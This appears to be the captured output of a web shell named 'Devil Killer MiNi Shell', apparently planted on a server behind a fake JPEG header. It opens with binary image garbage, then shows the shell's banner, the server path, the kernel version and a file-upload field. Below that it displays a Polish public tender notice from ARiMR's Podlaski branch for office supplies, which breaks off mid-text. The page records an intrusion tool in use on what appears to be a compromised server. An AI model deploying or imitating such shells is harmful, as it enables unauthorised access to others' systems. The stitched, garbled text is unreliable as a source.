JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221031/0041744301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa artykułów biurowych oraz materiałów archiwizacyjnych na potrzeby Podlaskiego Oddziału Regionalnego ARiMR oraz podległych jednostek organizacyjnych na terenie województwa podlaskiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">AGENCJA RESTRUKTURYZACJI I MODERNIZACJI ROLNICTWA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Podlaski Oddział Regionalny</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010613083</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łomża</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">18-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48862156311</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48862164513</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">podlaski@arimr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.arimr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> wspieranie rozwoju rolnictwa i obszarów wiejskich w roli akredytowanej agencji płatniczej </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa artykułów biurowych oraz materiałów archiwizacyjnych na potrzeby Podlaskiego Oddziału Regionalnego ARiMR oraz podległych jednostek organizacyjnych na terenie województwa podlaskiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-db8af451-58f2-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00417443</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/arimr <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja między Zamawiającym a Wykonawcami w niniejszym postępowaniu<br/>odbywa się przy użyciu środków komunikacji elektronicznej, tj. Platformy Zakupowej, zwanej dalej „Platformą Zakupową” dostępnej<br/>pod adresem https://platformazakupowa.pl/pn/arimr, gdzie należy wybrać zakładkę „postępowania”, a następnie przejść na formularz<br/>niniejszego postępowania.<br/>2. Złożenie oferty wraz z Załącznikami odbywa się poprzez formularz składania ofert znajdujący się na Platformie Zakupowej (po<br/>przejściu do strony niniejszego postępowania z sekcji „Formularz”).<br/>3. Za datę przekazania (wpływu oświadczeń, dokumentów, wniosków, zawiadomień oraz informacji) przyjmuje się datę ich przesłania<br/>za pośrednictwem Platformy Zakupowej poprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego”, po którym pojawi się<br/>komunikat, że wiadomość została wysłana do Zamawiającego.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>1) złożenie oferty możliwe jest przez Wykonawców, którzy posiadają konto na Platformie Zakupowej oraz przez Wykonawców<br/>nieposiadających konta na Platformie Zakupowej. W celu założenia konta na Platformie Zakupowej należy wybrać zakładkę „Zaloguj<br/>się” w kolejnym kroku należy wybrać „Załóż konto”, następnie należy wypełnić formularze i postępować zgodnie z poleceniami<br/>wyświetlającymi się ekranie monitora. W przypadku Wykonawców niezalogowanych w celu złożenia oferty niezbędne jest podanie<br/>adresu e-mail (na który wysyłane będzie potwierdzenie złożenia oferty), numeru NIP oraz nazwy firmy i nieobowiązkowo numeru<br/>telefonu,<br/>2) ofertę oraz oświadczenie, o którym mowa w art. 125 Ustawy, należy złożyć pod rygorem nieważności w formie elektronicznej<br/>podpisanej kwalifikowanym podpisem elektronicznym przez osoby upoważnione do tej czynności lub postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do tych czynności.<br/>3) Wykonawca składa ofertę, która w przypadku prawidłowego złożenia oferty zostaje automatycznie zaszyfrowana przez system.<br/>Nie jest możliwe zapoznanie się z treścią złożonej oferty przed upływem terminu otwarcia ofert,<br/>4) podpisywanie dokumentów w formie skompresowanej poprzez opatrzenie całego pliku jednym podpisem kwalifikowanym,<br/>podpisem zaufanym lub podpisem elektronicznym jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku<br/>odpowiednio kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym oraz z poświadczeniem za<br/>zgodność z oryginałem wszystkich elektronicznych kopii dokumentów. Dokumenty, co do których wymagana jest forma oryginału,<br/>muszą być podpisane indywidualnie (każdy z nich) kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym.<br/>2. niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10.4, Linux lub ich nowsze wersje,<br/>3) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików PDF.<br/>3. dopuszczalne formaty przesyłanych danych tj. plików wielkości do 150 MB. Zalecany format PDF.<br/>4. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip, .7Z.<br/>5. informacje na temat kodowania i czasu odbioru danych, tj.:<br/>1) szyfrowanie na Platformie Zakupowej odbywa się za pomocą protokołu TLS 1.3,<br/>2) plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany nie jest widoczny dla Zamawiającego, gdyż jest w systemie<br/>zaszyfrowany. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez system, co następuje po terminie otwarcia<br/>ofert,<br/>3) oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do oferty elektronicznej data oraz dokładny czas (hh:mm:ss),<br/>znajdujące się w kolumnie dotyczącej danej oferty w sekcji „Data złożenia oferty”.<br/>6. dopuszczalny format kwalifikowanego podpisu elektronicznego, podpisu zaufanego oraz podpisu osobistego, w przypadku:<br/>1) dokumentów sporządzonych w formacie PDF zaleca się podpisanie dokumentu w formacie PAdES,<br/>2) dokumentów sporządzonych w formacie innym niż PDF zaleca się podpisanie dokumentu w formacie XAdES</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna w zakresie przetwarzania danych osobowych została<br/>zamieszczona w Specyfikacji Warunków Zamówienia (załącznik do projektowanych postanowień umowy)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający nie przewiduje ograniczeń stosowania przepisów Rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) nr 2016/679 - zgodnie z art. 19 ust. 4 Ustawy prawo zamówień publicznych</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BOR10.2619.4.2022.AK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 294676,26 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający żąda określonej etykiety lub wskazuje mające zastosowanie wymagania określonej etykiety, zgodnie z art. 104 ustaw - etykiety środowiskowej (tzw. Ekoetykieta)</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiotem zamówienia jest dostawa artykułów biurowych na potrzeby Podlaskiego Oddziału Regionalnego ARiMR oraz podległych jednostek organizacyjnych na terenie województwa podlaskiego.<br/>2.	Szczegółowy opis przedmiotu zamówienia został zawarty w poniższych zestawieniu:<br/>Lp.	Nazwa towaru	Jednostka miary	Ilość<br/>1	Antyrama plexi A4, rozmiar: 210 x 297 mm	sztuka	30<br/>2	Długopis automatyczny z wymiennym wkładem, gumowy uchwyt/ elementy gumowe w części chwytowej gwarantujące komfort pisania, posiadający klips, końcówka kulkowa min. 0,6 mm, wkład koloru niebieskiego	sztuka	2 625<br/>3	Dratwa/sznurek lniany lekko sztywny o średnicy min. 1,1 mm, szpula o długości ok. 120 metrów, kolor naturalny	sztuka	32<br/>4	Druki &#34;potwierdzenia odbioru&#34;, wykorzystywane przy nadawaniu korespondencji w trybie Kodeksu Postępowania Administracyjnego. Wykonane na białym papierze offsetowym BD o gramaturze 140-200 g/m², 1) wymiar druku*: <br/>• minimalne: 90 x 140 mm (część środkowa, bez listew bocznych); <br/>• optymalne wymiary:<br/>a) część środkowa, bez listew bocznych: 100 x 140 mm,<br/>b) całość druku, tj. część środkowa + listwy boczne: 100 x 160 mm;<br/>* wszystkie wymiary przyjmuje się z tolerancją 2 mm <br/>2) listwy po obu stronach, perforacja pionowa pozwalająca na wyrwanie środkowej części druku, bez jego uszkodzenia;<br/>3) co najmniej 5 mm pasek kleju gwarantujący przyczepność do różnego rodzaju podłoża w zróżnicowanym zakresie temperatur, zabezpieczony osłoną.<br/>Adres nadawcy przesyłki:<br/>- naniesiony w strefie prostokątnej na stronie przedniej druku (awers), w dolnej prawej części w minimalnej odległości: <br/>• 40 mm od górnego brzegu;<br/>• 5 mm od prawego brzegu;<br/>• 15 mm od dolnego brzegu. <br/>Adres adresata przesyłki:<br/>- naniesiony w strefie prostokątnej na stronie przedniej druku (awers), w górnej lewej części. <br/>W pasie 15 mm powyżej dolnej krawędzi strony przedniej druku (awers) oraz z prawej strony danych adresowych nadawcy nie można umieszczać żadnych napisów/nadruków. Zastrzeżenie – na druku nie może być zamieszczona adnotacja o producencie. Druki pakowane po 500 szt. Wzór druku stanowi załącznik nr 8 do SWZ	sztuka	105 500<br/>5	Gumki recepturki, średnica (bez rozciągania) 70-80 mm, opakowanie 1 kg	opakowanie 22<br/>6	Klej w płynie z aplikatorem do sklejania papieru, pojemność: 40-50 ml	sztuka	570<br/>7	Koperty rozszerzane C4 HK, wymiary 229x324x40 (+/- 5 mm), gramatura papieru min. 120/g/m2, kolor brązowy, opakowanie 100 sztuk	opakowanie	26<br/>8	Koperty bezpieczne B4 transparentne <br/>•trójwarstwowa folia LDPE o grubości 70 mikronów [+/ –5%], materiał trwały i odporny na warunki atmosferyczne, kod kreskowy dla ułatwienia identyfikacji i możliwości śledzenia przesyłki, kolejne, niepowtarzalne numerowanie kopert (pod taśmą zabezpieczającą i na kopercie), panel opisowy, bezpieczny zgrzew boczny płaski z mikro nadrukiem - 9 mm [+/ –3%], trwałe zamknięcie samoprzylepne z paskiem i integratorem ciepła - taśma bezpieczna 35mm (z zabezpieczeniem mechanicznym, termicznym, chemicznym), dwa odrywane odcinki przewozowe (z numeracją koperty powieloną w kodzie kreskowym)	sztuka	100<br/>9	Koperty DL HK (samoklejące z paskiem) bez okienka, opakowanie 1000 sztuk	opakowanie	6<br/>10	Koperty DL HK (samoklejące z paskiem) z okienkiem standard z prawej strony, opakowanie 1000 sztuk	opakowanie	92<br/>11	Koperty papierowe pełne (bez okienka) na płyty CD, opakowanie 100 sztuk	opakowanie	71<br/>12	Koperty formatu C6 HK (samoklejące z paskiem), bez okienka, białe opakowanie 50 sztuk	opakowanie	83<br/>13	Koperty formatu C4 HK (samoklejące z paskiem), bez okienka, białe, opakowanie 50 sztuk	opakowanie	151<br/>14	Koperty formatu C4 HK (samoklejące z paskiem), z okienkiem z prawej strony, białe, opakowanie 50 sztuk	opakowanie	9<br/>15	Koperty formatu C5 HK (samoklejące z paskiem) bez okienka, białe, opakowanie 50 sztuk	opakowanie	235<br/>16	Koperty formatu C5 HK (samoklejące z paskiem) z okienkiem z prawej strony, białe, opakowanie 50 sztuk	opakowanie	7<br/>17	Koperty formatu C5 HK (samoklejące z paskiem) okno prawe środek, białe, opakowanie 500 sztuk	opakowanie	8<br/>18	Kostka papierowa biała - wkład do pojemników plastikowych, klejona; rozmiar 83-85x83-85x35-40 mm	bloczek	380<br/>19	Kostka samoprzylepna 100k o wymiarach 51x38 mm (+/-2 mm), kartki w kolorze żółtym, każda kartka nasączona wzdłuż jednej krawędzi klejem umożliwiającym jej wielokrotne przyklejanie i odklejanie	bloczek	1 545<br/>20	Kostka samoprzylepna 100k o wymiarach 76x76 mm (+/-2 mm), kartki w kolorze żółtym, każda kartka nasączona wzdłuż jednej krawędzi klejem umożliwiającym jej wielokrotne przyklejanie i odklejanie	bloczek	1 344<br/>21	Koszulka foliowa na płyty CD z możliwością wpięcia do segregatora, opakowanie 50 sztuk	opakowanie	12<br/>22	Koszulka krystaliczna na dokumenty formatu A4 z możliwością wpięcia do segregatora, bezbarwna, otwierana z góry, antystatyczna i antyrefleksyjna, folia o grubości min. 45 µm, opakowanie 100 sztuk	opakowanie	1 109<br/>23	Koszulka na dokumenty formatu A4 z klapą boczną z możliwością wpięcia do segregatora, bezbarwna, folia o grubości min. 100 µm, opakowanie 10 sztuk	opakowanie	70<br/>24	Koszulka na katalogi formatu A4, z możliwością wpięcia do segregatora. Otwarta od góry, bez klapki, bezbarwna, folia o grubości min. 150 µm, opakowanie 10 sztuk. opakowanie	58<br/>25	Marker permanentny do opisywania płyt CD/DVD, wodoodporny, nietoksyczny, kolor czarny, grubość pisania 0,3-0,5 mm sztuka	145<br/>26	Nici bawełniane nabłyszczane, waga: min. 100 g, długość: min. 80 m, białe, udźwig: 10,7 kg, siła zrywająca: min. 11,2/Nm	sztuka	136<br/>27	Papier ksero formatu A4 biały o gram 120g/m², grubość min. 120 μm, białość min. 166 CIE, nieprzezroczystość min. 92%, wilgotność 3–6 %. posiada oznakowanie ekologiczne EU Ecolabel lub FSC (Forest Stewardship Council). Karton (5 ryz w kartonie, każda ryza 250 kartek)	karton	10<br/>28	Papier ksero formatu A4 biały o gram 80g/m² +/-2; grubość min. 104 μm, białość min. 164 CIE, nieprzezroczystość min. 92%, wilgotność 3–6 %; posiada oznakowanie ekologiczne EU Ecolabel lub FSC (Forest Stewardship Council) lub PEFC (Programme for Endorsement of Forest Certification). Karton (5 ryz w kartonie każda ryza 500 kartek)*	karton	1 080<br/>29	Płyn do czyszczenia matryc LCD/TFT, pojemność min. 250 ml sztuka	81<br/>30	Pianka do czyszczenia plastików (antystatyczna bakteriobójcza) do czyszczenia sprzętu komputerowego i biurowego opak. min 400 ml	sztuka	65<br/>31	Powietrze sprężone do usuwania zanieczyszczeń z urządzeń elektronicznych, elektromechanicznych itp., opakowanie o pojemności min. 400 ml	sztuka	131<br/>32	Przekładka kartonowa 1-12 kolor formatu A4- 12 przekładek numerycznych od 1 do 12	opakowanie	19<br/>33	Ramka A4 na zdjęcia wykonana z tworzywa sztucznego posiadająca szklaną szybkę, tył wykonany z płyty HDF, wyposażona w nóżkę do postawienia oraz haczyk do zawieszenia, rozmiar: 210 x 297 mm, kolor srebrny	sztuka	20<br/>34	Ręcznik papierowy w rolkach, długość rolki min. 100 m, papier celulozowy, dwuwarstwowy, biały, perforowany.	sztuka	107<br/>35	Skoroszyt oczkowy 1/2 z otworami pozwalającymi na wpięcie do segregatora, wykonany z kartonu o gramaturze 250-280g/m² biały	sztuka	8 350<br/>36	Skoroszyt oczkowy pełny z otworami pozwalającymi na wpięcie do segregatora, wykonany z kartonu o gramaturze 250-280g/m² biały	sztuka	270<br/>37	Ściereczka czyszcząca z mikrofibry do ekranów LCD, sprzętu optycznego, nie niszcząca powierzchni, nie zostawiająca mikro rys, wielokrotnego użytku	sztuka	504<br/>38	Tablica korkowa 80 x 100 (+/- 1cm)	sztuka	3<br/>39	Tablica korkowa 30 x 60 (+/- 1cm)	sztuka	1<br/>40	Tablica korkowa 60 x 80 (+/- 1cm)	sztuka	3<br/>41	Taśma dwustronna cienka, klejąca na folii PP, szerokość 18-24 mm, długość 10-15 m	sztuka	19<br/>42	Taśma dwustronna, klejąca na folii PP, szerokość 30-50 mm, długość 10-25 m	sztuka	24<br/>43	Taśma pakowa przezroczysta, jednostronna, szerokość 48-50 mm, długość 60-66 m	sztuka	304<br/>44	Taśma samoprzylepna przezroczysta, jednostronna, bez podajnika o wymiarach 18-20 mm, długość 24-33 m	sztuka	525<br/>45	Tusz bezolejowy uniwersalny, do każdego rodzaju stempli, kolor czarny, pojemność 25-30 ml	sztuka	7<br/>46	Tusz bezolejowy uniwersalny, do każdego rodzaju stempli, kolor niebieski, pojemność 25-30 ml	sztuka	52<br/>47	Tusz bezolejowy uniwersalny, do każdego rodzaju stempli, kolor zielony, pojemność 25-30 ml	sztuka	65<br/>48	Wkład do długopisu z poz. 2 kolor niebieski	sztuka	1 195<br/>49	Zestaw 4 markerów do tablic suchościeralnych z gąbką, mix kolorów	komplet	66<br/>50	Zszywki stalowe wykonane z wysokiej jakości galwanizowanego materiału typ 24/6, opakowanie 1000 sztuk	opakowanie	474<br/>51	Zszywki stalowe wykonane z wysokiej jakości galwanizowanego materiału, typ 23/10 opakowanie 1000 sztuk	opakowanie	77<br/>3.	Warunki wykonania zamówienia zostały opisane w SWZ </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 251719,76 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30190000-7 - Różny sprzęt i artykuły biurowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30197644-2 - Papier kserograficzny</p> <p class="mb-0">30197210-1 - Skoroszyty kołowe</p> <p class="mb-0">30192800-9 - Etykiety samoprzylepne</p> <p class="mb-0">30197220-4 - Spinacze do papieru</p> <p class="mb-0">30197320-5 - Zszywacze</p> <p class="mb-0">30197330-8 - Dziurkacze</p> <p class="mb-0">30199230-1 - Koperty</p> <p class="mb-0">30192121-5 - Długopisy kulkowe</p> <p class="mb-0">30192130-1 - Ołówki</p> <p class="mb-0">30237430-2 - Markery</p> <p class="mb-0">39241200-5 - Nożyczki</p> <p class="mb-0">24910000-6 - Kleje</p> <p class="mb-0">22000000-0 - Druki i produkty podobne</p> <p class="mb-0">19520000-7 - Produkty z tworzyw sztucznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym dokumentach zamówienia i zostanie oceniona jako najkorzystniejsza w oparciu o podane poniżej kryteria wyboru:<br/><br/>1)	kryterium „cena oferty” – C – waga kryterium 60%<br/>W ramach kryterium „cena oferty” (C) oceniana będzie najniższa łączna cena oferty brutto za realizację całości zamówienia podana w Formularzu Ofertowym. Ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>C = Cn/Co x 60 pkt<br/>gdzie:<br/>C – liczba punktów przyznanych ofercie w kryterium łączna 